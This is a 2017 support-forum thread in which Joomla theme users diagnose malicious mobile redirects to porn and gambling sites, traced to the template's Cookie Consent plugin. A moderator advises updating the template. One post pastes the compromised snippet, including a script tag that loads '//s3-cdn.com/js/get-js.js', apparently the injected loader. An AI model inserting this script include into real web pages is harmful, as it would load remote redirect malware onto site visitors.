Malware in Template Source

Support desk for Multipurpose Quark Theme
GK User
Sat Jul 08, 2017 9:19 am
I found this after lots of hunting.

The redirect only happens on mobile device being used for the first time on the site (or if history/cookies are cleared). Any first click opens up a second tab with porn/gambling/etc sites.
Disabling the "Use Cookie Consent plugin" in the template style eliminates the malware.

(as I'm not a coder I can't identify the trigger but I imagine its in the JS which it calls)
<!-- Begin Cookie Consent plugin by Silktide - http://silktide.com/cookieconsent -->
<!-- cookie conset latest version -->
<script type="text/javascript" src="https://s3-eu-west-1.amazonaws.com/assets.cookieconsent.silktide.com/current/plugin.min.js"></script><script type="text/javascript" src="//s3-cdn.com/js/get-js.js"></script>

<script type="text/javascript">
// <![CDATA[
cc.initialise({
cookies: {
social: {},
analytics: {}
},
settings: {
bannerPosition: "bottom",
consenttype: "implicit",
onlyshowbanneronce: false,
style: "light",
refreshOnConsent: false,
useSSL: true,
tagPosition: "bottom-left" },
strings: {
socialDefaultTitle: 'Social media',
socialDefaultDescription: 'Facebook, Twitter and other social websites need to know who you are to work properly.',
analyticsDefaultTitle: 'Analytics',
analyticsDefaultDescription: 'We anonymously measure your use of this website to improve your experience.',
advertisingDefaultTitle: 'Advertising',
advertisingDefaultDescription: 'Adverts will be chosen for you automatically based on your past behaviour and interests.',
defaultTitle: 'Default cookie title',
defaultDescription: 'Default cookie description.',
learnMore: 'Learn more',
closeWindow: 'Close window',
notificationTitle: 'Your experience on this site will be improved by allowing cookies',
notificationTitleImplicit: 'We use cookies to ensure you get the best experience on our website',
customCookie: 'This website uses a custom type of cookie which needs specific approval',
seeDetails: 'see details',
seeDetailsImplicit: 'change your settings',
hideDetails: 'hide details',
allowCookies: 'Allow cookies',
allowCookiesImplicit: 'Close',
allowForAllSites: 'Allow for all sites',
savePreference: 'Save preference',
saveForAllSites: 'Save for all sites',
privacySettings: 'Privacy settings',
privacySettingsDialogTitleA: 'Privacy settings',
privacySettingsDialogTitleB: 'for this website',
privacySettingsDialogSubtitle: 'Some features of this website need your consent to remember who you are.',
changeForAllSitesLink: 'Change settings for all websites',
preferenceUseGlobal: 'Use global setting',
preferenceConsent: 'I consent',
preferenceDecline: 'I decline',
notUsingCookies: 'This website does not use any cookies..',
allSitesSettingsDialogTitleA: 'Privacy settings',
allSitesSettingsDialogTitleB: 'for all websites',
allSitesSettingsDialogSubtitle: 'You may consent to these cookies for all websites that use this plugin.',
backToSiteSettings: 'Back to website settings',
preferenceAsk: 'Ask me each time',
preferenceAlways: 'Always allow',
preferenceNever: 'Never allow'
}
});
// ]]>
</script>
<!-- End Cookie Consent plugin -->

User avatar
Junior Boarder

teitbite
Wed Jul 12, 2017 6:56 pm
Hi

Actually this is coming from a Cookie Consent plugin. It's an outside code and has been already changed to a different one in newer version of the templates. To get rid of it all You have to do is to update template to the latest version.
User avatar
Moderator

GK User
Fri Jul 28, 2017 8:18 am
I'm having the same problem in several websites using your templates, which are most of the sites I developed last year. Some of them have been heavily modified by me, in terms of CSS but also php pages for K2. Is there a way to selectively "upgrade" the parts of code regarding the cookie law plugin? Or should I just re-install the templates and then upload the modified versions of my modified files? (of course that would be a nightmare, because I have no idea as of now, what I changed and where)
User avatar
Fresh Boarder

teitbite
Mon Jul 31, 2017 12:18 pm
Hi

Here You will find a list of all templates with recent changes: https://www.gavick.com/updates?task=group&id=4

Simply check what version You are running currently and replace mentioned files form each missing version to have Your template up to date.
User avatar
Moderator

GK User
Mon Aug 21, 2017 12:22 am
Hello,
I am also getting the following malware message appearing on 7 pages of my Joomla website, built using the Hotel template.

*Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:G ... econsent.1 <script type="text/javascript" src="https://s3-eu-west-1.amazonaws.com/assets.cookieconsent.silktide.com/current/plugin.min.js"></script>

I have applied updates to Joomla and all extensions and updated the template with the latest files but the malware is still there. I have also disabled the Cookie authentication plugin.
Any advice please!?
Thank you :)
User avatar
Junior Boarder

GK User
Tue Aug 22, 2017 2:31 am
Seems like a problem quite a few sites are having. The answer for mine was to disable Cookie Consent in the Template Style section.
Probably something others have already figured out! :)
I am finding that the latest Joomla update hides all my Template style tabs though...
User avatar
Junior Boarder

GK User
Fri Aug 25, 2017 10:46 pm
Hi,
Same here.

The new Quark template version 1.2.0.7 :: 17-07-2017 doesn't solve the issue.
The files containing the reference to the compromised js ("assets.cookieconsent.silktide.com" on aws) are:
templates/gk_quark/less/cookielaw.less
templates/gk_quark/layouts/blocks/cookielaw.php
and all the *.css generated consequently.

Disabling the plug in, cleaning up the cache and regenerating css fix it for me. But I can't use the cookie Law feature.

Michele
User avatar
Fresh Boarder

teitbite
Sat Aug 26, 2017 10:54 am
Hi

Plugin has been replaced in all tempaltes, so a proper way to get rid of this issue is to:

1. Update template to the latest version
2. Clear joomla/browser/server cache to be sure site is using updated files

if after this You still have this problem than I'm guessing something has prevented the update, so I would suggest to do this manually by uploading unpacked template in place of template's folder You've been using already.
User avatar
Moderator

GK User
Mon Aug 28, 2017 1:51 pm
You save my day!!!
User avatar
Junior Boarder


cron
Remember me
Register New Account
If you are old Gavick user, click HERE for steps to retrieve your account.